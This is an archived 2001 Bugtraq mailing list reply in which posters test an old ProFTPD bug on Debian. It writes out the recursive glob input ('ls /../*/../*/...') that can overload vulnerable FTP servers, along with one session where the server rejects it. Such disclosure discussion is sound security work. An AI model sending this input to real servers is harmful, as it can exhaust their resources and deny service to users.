Bugtraq mailing list archives

RE: Multiple-Vendor-FTP-Vuln. (old?)


From: Michael Bellears <michael.bellears () staff datafx com au>
Date: Tue, 21 Aug 2001 08:43:54 +1000

Couldn't reproduce on Debian 2.2....

isp-server-03:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bin
200 Type set to I.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*: Forbidden command argument
ftp> quit
221 Goodbye.

Regards,
MB


-----Original Message-----
From: Michael Faurot [mailto:mfaurot () atww org]
Sent: Tuesday, 21 August 2001 5:20 AM
To: bugtraq () securityfocus com
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)


Enrico Kern <IphantomI () web de> wrote:
: Hi,

: I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
: many new Linux-Dist..

This bug appears to still be present with Debian Stable (Potato) which
uses ProFTPd v1.2.0pre10.

-- 
------------------------------------------------------------------------------
 Michael | mfaurot  | Give your child mental blocks for Christmas.
 Faurot  | atww.org | 


